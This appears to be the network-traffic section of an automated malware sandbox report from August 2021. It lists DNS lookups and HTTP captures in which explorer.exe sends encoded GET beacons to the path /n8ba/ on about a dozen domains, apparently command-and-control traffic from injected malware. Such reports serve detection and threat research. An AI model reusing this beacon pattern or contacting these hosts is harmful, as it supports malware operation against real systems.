                                                                      Aug 3, 2021 22:57:10.232912064 CEST5653453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:10.265672922 CEST53565348.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:10.915294886 CEST5662753192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:10.940304041 CEST53566278.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:12.029608965 CEST5662153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:12.062016010 CEST53566218.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:13.035835028 CEST6311653192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:13.071340084 CEST53631168.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:14.051841974 CEST6407853192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:14.087236881 CEST53640788.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:15.604326010 CEST6480153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:15.629692078 CEST53648018.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:17.571784973 CEST6172153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:17.599699974 CEST53617218.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:25.246769905 CEST5125553192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:25.279758930 CEST53512558.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:45.640351057 CEST6152253192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:45.684551954 CEST53615228.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:46.651422977 CEST5233753192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:46.695890903 CEST53523378.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:47.302846909 CEST5504653192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:47.336843967 CEST53550468.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:47.785346985 CEST4961253192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:47.820818901 CEST53496128.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:48.274029016 CEST4928553192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:48.307547092 CEST53492858.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:48.739514112 CEST5060153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:48.772067070 CEST53506018.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:48.830027103 CEST6087553192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:48.878247023 CEST53608758.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:49.707019091 CEST5644853192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:49.739471912 CEST53564488.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:52.043704033 CEST5917253192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:52.079186916 CEST53591728.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:52.843178988 CEST6242053192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:52.870497942 CEST53624208.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:57:53.271814108 CEST6057953192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:57:53.305176973 CEST53605798.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:05.409841061 CEST5018353192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:05.453965902 CEST53501838.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:13.596266985 CEST6153153192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:13.642642975 CEST53615318.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:18.726607084 CEST4922853192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:18.765275955 CEST53492288.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:24.663558960 CEST5979453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:24.712186098 CEST53597948.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:34.945233107 CEST5591653192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:34.985972881 CEST53559168.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:38.813359976 CEST5275253192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:38.854666948 CEST53527528.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:40.129602909 CEST6054253192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:40.165779114 CEST53605428.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:40.669241905 CEST6068953192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:40.712965965 CEST53606898.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:45.406763077 CEST6420653192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:45.552557945 CEST53642068.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:51.068439960 CEST5090453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:51.228625059 CEST53509048.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:58:56.819432974 CEST5752553192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:58:56.871318102 CEST53575258.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:59:01.888334036 CEST5381453192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:59:01.940015078 CEST53538148.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:59:07.162071943 CEST5341853192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:59:07.200175047 CEST53534188.8.8.8192.168.2.4
                                                                      Aug 3, 2021 22:59:12.713824987 CEST6283353192.168.2.48.8.8.8
                                                                      Aug 3, 2021 22:59:13.000466108 CEST53628338.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Aug 3, 2021 22:58:13.596266985 CEST192.168.2.48.8.8.80xd725Standard query (0)www.narrowpathwc.comA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:18.726607084 CEST192.168.2.48.8.8.80xbe4aStandard query (0)www.braun-mathematik.onlineA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:24.663558960 CEST192.168.2.48.8.8.80x1b08Standard query (0)www.lifestylebykendra.comA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:34.945233107 CEST192.168.2.48.8.8.80xeb5aStandard query (0)www.teamtacozzzz.comA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:40.129602909 CEST192.168.2.48.8.8.80x7034Standard query (0)www.ascope.clubA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:45.406763077 CEST192.168.2.48.8.8.80xa438Standard query (0)www.5fashionfix.netA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:51.068439960 CEST192.168.2.48.8.8.80x1acfStandard query (0)www.mtsnurulislamsby.comA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:56.819432974 CEST192.168.2.48.8.8.80xa58bStandard query (0)www.cypios.netA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:01.888334036 CEST192.168.2.48.8.8.80x959fStandard query (0)www.wintonplaceoh.comA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:07.162071943 CEST192.168.2.48.8.8.80x42cbStandard query (0)www.ominvestment.netA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:12.713824987 CEST192.168.2.48.8.8.80x9919Standard query (0)www.backtothesimplethings.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Aug 3, 2021 22:58:13.642642975 CEST8.8.8.8192.168.2.40xd725No error (0)www.narrowpathwc.comnarrowpathwc.comCNAME (Canonical name)IN (0x0001)
                                                                      Aug 3, 2021 22:58:13.642642975 CEST8.8.8.8192.168.2.40xd725No error (0)narrowpathwc.com160.153.136.3A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:18.765275955 CEST8.8.8.8192.168.2.40xbe4aNo error (0)www.braun-mathematik.online217.160.0.129A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:24.712186098 CEST8.8.8.8192.168.2.40x1b08No error (0)www.lifestylebykendra.comlifestylebykendra.comCNAME (Canonical name)IN (0x0001)
                                                                      Aug 3, 2021 22:58:24.712186098 CEST8.8.8.8192.168.2.40x1b08No error (0)lifestylebykendra.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:34.985972881 CEST8.8.8.8192.168.2.40xeb5aNo error (0)www.teamtacozzzz.comteamtacozzzz.comCNAME (Canonical name)IN (0x0001)
                                                                      Aug 3, 2021 22:58:34.985972881 CEST8.8.8.8192.168.2.40xeb5aNo error (0)teamtacozzzz.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:40.165779114 CEST8.8.8.8192.168.2.40x7034No error (0)www.ascope.clubascope.clubCNAME (Canonical name)IN (0x0001)
                                                                      Aug 3, 2021 22:58:40.165779114 CEST8.8.8.8192.168.2.40x7034No error (0)ascope.club95.215.210.10A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:45.552557945 CEST8.8.8.8192.168.2.40xa438No error (0)www.5fashionfix.net199.34.228.189A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:51.228625059 CEST8.8.8.8192.168.2.40x1acfNo error (0)www.mtsnurulislamsby.com209.99.40.222A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:58:56.871318102 CEST8.8.8.8192.168.2.40xa58bName error (3)www.cypios.netnonenoneA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:01.940015078 CEST8.8.8.8192.168.2.40x959fNo error (0)www.wintonplaceoh.comwintonplaceoh.comCNAME (Canonical name)IN (0x0001)
                                                                      Aug 3, 2021 22:59:01.940015078 CEST8.8.8.8192.168.2.40x959fNo error (0)wintonplaceoh.com198.71.233.107A (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:07.200175047 CEST8.8.8.8192.168.2.40x42cbName error (3)www.ominvestment.netnonenoneA (IP address)IN (0x0001)
                                                                      Aug 3, 2021 22:59:13.000466108 CEST8.8.8.8192.168.2.40x9919No error (0)www.backtothesimplethings.com146.148.189.194A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.narrowpathwc.com
                                                                      • www.braun-mathematik.online
                                                                      • www.lifestylebykendra.com
                                                                      • www.teamtacozzzz.com
                                                                      • www.ascope.club
                                                                      • www.5fashionfix.net
                                                                      • www.mtsnurulislamsby.com
                                                                      • www.wintonplaceoh.com
                                                                      • www.backtothesimplethings.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449760160.153.136.380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:13.679682016 CEST6490OUTGET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.narrowpathwc.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:13.709467888 CEST6490INHTTP/1.1 400 Bad Request
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449761217.160.0.12980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:18.790474892 CEST6491OUTGET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.braun-mathematik.online
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:19.141275883 CEST6491INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Tue, 03 Aug 2021 20:58:18 GMT
                                                                      Server: Apache
                                                                      X-Powered-By: PHP/7.4.21
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"
                                                                      Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                      Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44976234.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:24.780153990 CEST6493OUTGET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.lifestylebykendra.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:24.895252943 CEST6493INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Tue, 03 Aug 2021 20:58:24 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6104856e-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:35.005968094 CEST6494OUTGET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.teamtacozzzz.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:35.119534016 CEST6494INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Tue, 03 Aug 2021 20:58:35 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6104831f-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.44976595.215.210.1080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:40.275065899 CEST6505OUTGET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.ascope.club
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:40.384103060 CEST6505INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 03 Aug 2021 20:58:40 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 38 62 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n8ba/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449767199.34.228.18980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:45.724736929 CEST6516OUTGET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.5fashionfix.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:46.029402018 CEST6517INHTTP/1.1 302 Found
                                                                      Server: nginx
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, private
                                                                      Date: Tue, 03 Aug 2021 20:58:45 GMT
                                                                      Location: http://www.5fashionfix.net/n8ba/?3fu=6Zij7uW2iyXo7QMuDf%2FVYdYdyy83rT%2Fk8hgIaZr1o%2F2iUx0BtZlp%2FrHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN
                                                                      Set-Cookie: publishedsite-xsrf=eyJpdiI6IlByNitCZDdQa1ZPT0k1S1dvMnp4SGc9PSIsInZhbHVlIjoiQ2JVaDlGRW5KUFwvT25CYmlDQmc0SHRPOXFwS040UlZxMlFlazNMRnhac01qU2d4TWN1bkRvMFdXQVIwcVF0cDhqNFRPejY1RVpqVGYwRnFFeVlIaWRlN0g5Mmg0R1NLK2xBUmNweFVtTVZCMFdEekNnVWZEaXFSVmhFbmNSXC8xUiIsIm1hYyI6IjVhMjQ0ODliOWNjMWY1ZGRkMmJiMGQ2NjJlMGEzYjRiNDA3ZTdiMDMzNDM0NmQ1Mzk0NWQ4YjdlNWRiZWUzYTkifQ%3D%3D; expires=Tue, 17-Aug-2021 20:58:45 GMT; Max-Age=1209600; path=/
                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVVMEl0XC9RWjFxdEdKVXo5MVAyZFlRPT0iLCJ2YWx1ZSI6Imc0aU5JemdzWDU0NHhnSU5ldVpGa3ZudTMweWo2MHl5ZENYeEdhY0loR2NJNnJXQ2lCeDkxXC9xS2xxbms0ZDh2OHF3cDRJemFKYkZpVldEcXZvUmVXeEpybUkwOEJzN2hZcjhDaVVGaXo4WTg1WTA4b0M2ZjMzNDlPenBcL2RsU2kiLCJtYWMiOiI2OWY0NjQ0MjJmNDc3ZTQ2OTZmNmVhMDM3N2FlNDYwNDY4OTgzMTRhYWQzZWZjNmE5ZmFjN2IzNzVlZWYwZTQ1In0%3D; expires=Tue, 17-Aug-2021 20:58:45 GMT; Max-Age=1209600; path=/
                                                                      Set-Cookie: PublishedSiteSession=eyJpdiI6Ijd3bmRFUEdcLzhncUE5NExUWXFRU0FnPT0iLCJ2YWx1ZSI6IitLcGxKRWtSbmxKUFd5TFYwWnQ5RlR2NGZsMVwvbkQ2
                                                                      Data Raw:
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449768209.99.40.22280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:58:51.370229959 CEST6519OUTGET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.mtsnurulislamsby.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Aug 3, 2021 22:58:51.673170090 CEST6521INHTTP/1.1 200 OK
                                                                      Date: Tue, 03 Aug 2021 20:58:51 GMT
                                                                      Server: Apache
                                                                      Set-Cookie: vsid=928vr3755699315633120; expires=Sun, 02-Aug-2026 20:58:51 GMT; Max-Age=157680000; path=/; domain=www.mtsnurulislamsby.com; HttpOnly
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KvIIkOPz7WLnVRTf8LHDjo9O0elGImNLy6XSGM/TSCdOPt93/mdvA970byhLz99yLnw5bzDiaDRB8/QuJRv/bQ==
                                                                      Keep-Alive: timeout=5, max=127
                                                                      Connection: Keep-Alive
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 35 61 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 74 73 6e 75 72 75 6c 69 73 6c 61 6d 73 62 79 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 74 73 6e 75 72 75 6c 69 73 6c 61 6d 73 62 79 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 74 73 6e 75 72 75 6c 69 73 6c 61 6d 73 62 79 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 65 46 5a 4e 5a 6c 68 53 64 46 56 70 53 33 64 75 4e 47 73 32 54 32 68 6f 51 32 35 6a 4f 57 74 4c 62 46 6c 72 61 48 56 47 56 6b 46 59 56 79 39 43 4e 30 78 69 4e 58 46 5a 61 6d 31 6a 4f 43 74 43 4d 48 64 6c 56 46 68 59 4d 31 56 73 59 6d 38 34 4d 48 46 45 53 7a 64 35 63 30 35 6d 55 69 39 52 53 30 74 32 5a 45 46 77 65 6a 64 6b 52 54 56 46 64 6e 51 30 62 47 73 30 65 55 68 47 57 6b 6c 36 54 6e 5a 53 52 54 4e 42 59 55 52 69 65 6d 4d 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68
                                                                      Data Ascii: 5ad3<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.mtsnurulislamsby.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.mtsnurulislamsby.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy9CN0xiNXFZam1jOCtCMHdlVFhYM1VsYm84MHFESzd5c05mUi9RS0t2ZEFwejdkRTVFdnQ0bGs0eUhGWkl6TnZSRTNBYURiemM9&b="+abp;document.body.appendCh


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.449769198.71.233.10780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Aug 3, 2021 22:59:02.047455072 CEST6546OUTGET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1
                                                                      Host: www.wintonplaceoh.com
                                                                      Connection: close
